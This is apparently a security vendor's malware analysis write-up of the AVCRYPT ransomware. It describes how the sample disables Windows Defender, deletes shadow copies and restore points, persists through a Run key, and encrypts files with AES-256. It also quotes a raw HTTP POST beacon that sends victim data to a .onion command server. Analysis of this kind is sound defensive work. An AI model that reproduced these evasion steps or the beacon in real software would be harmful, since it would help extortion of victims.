Here at Sequretek Malware Analysis lab (SMA-LAB) we observed a new type of clever and sophisticated Ransomware variant dubbed as “AVCRYPT” which attempts to uninstall existing security software present on the victim PCs before performing its malevolent activities.
AVCRYPT was discovered by cyber-security researchers which include Lawrence Abrams, MalwareHunterTeam and Michael Gillespie.
Advanced Static Analysis
Tools Used: IDA-Pro, PeID, Resource Hacker etc
Most of the modern malware executables are either obfuscated, encrypted, packed in an attempt to make it harder for anti-malware vendors to detect and analyze them. Our sample is no different, as shown in the figure 1 below, the resource section of the executable seems to be packed as it contains high entropy value as 8.
After analyzing the sample further, we were able to identify file names in the resource section.
Upon further investigation, we were successfully able to extract resources (executables and DLL’s) from the windows binary which seems to be suspicious as shown in figure 3 above.
Figure 4 gives us a clue regarding the sample functionality that it can be a ransomware.
The sample makes use of ShellExecuteExW to execute cmd.exe.
From the Images above, we can Identify that it uses windows registry to Disable Windows Defender.
The sample makes use of windows wmic to delete shadow copies in order to prevent users from restoring their infected systems.
The sample is making changes in registry which disables exe signature checking functionality of the downloaded files of the internet explorer. We can suspect that the sample could try downloading additional malwares on to victims PC.
The executable makes use of victim’s user name to create a executable with the name of the user. Next it creates a bat file.
In order to check the internet connection is available on victims pc it makes use of InternetCheckConnection API. This shows the sample requires active internet connection to proceed further.
The sample makes use of SRRemoveRestorePoint API imported from SRClient.dll in order to delete restore points present on the system.
Disables the essential above services in order to evade the detection and prevents receiving windows updates.
As shown above the sample makes use of onion website which can be accessed via TOR browser which relates to figure 1.
As shown above, the Malware launches multiple cmd.exe and Sc.exe to accomplish many tasks like
The Malware extracts many files to the Temp Folder which is hidden in the Resource section. The Malware moves itself to “AppData” location with the name of the User ex: steve.exe and also with a hidden attribute. It has the Auto-Start capability by creating a Registry entry in the Run location.
Before starting the encryption process, It checks the Network Connection availability by visiting “microsoft.com” which is shown in the screenshot above. After successful Network Connection it sends some information to the Remote Server which is given below.
“POST /index.php HTTP/1.1..Host: bxp44w3qwwrmuupconion:9050..User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)..Referer: bxp44w3qwwrmuupc.onion..Content-Type: application/x-www-form-urlencoded..Content-Length: 105..Accept-Charset: utf-8..Pragma: no-cache..Cache-Control: no-cache..Connection: keep alive….id=1824835925&k=GJhPiOAF8_V0&Zds6JYLf8CebUTpGv1068096&c=India Standard Time&o=Windows 7 Ultimate&m=L”
From the above Post Request, It is clearing shown that the Malware might create an unique for each computer it infects. Then it is obtaining the Time Zone information to find out the location and also the Victims Operating System
The following Windows API’s were used to perform the Encryption Activity after successful Internet Connection.
Opening the file using CreateFileW. Then it uses CryptAcquireContextW to find out the Default Cryptographic Provider.
CryptCreateHash is used for creating an object for hashing. CALG_MD5 is the Algorithm used for Hashing in our case.
CryptHashData is used for hashing the Data.
CryptDeriveKey is used for Deriving the Key. In our case it is CALG_AES_256.
CryptEncrypt is then finally called to complete the Encryption Process.
This Ransomware behaves as its name. It tries to lower the security of the System by deleting multiple services and uses hiding techniques to evade.
Kindly be aware of the suspicious unknown files from un-trusted sources.
Analysed By: Sanjeev Kumar, Priyesh Nargunde, Vidhi Patel.
Indicators of compromise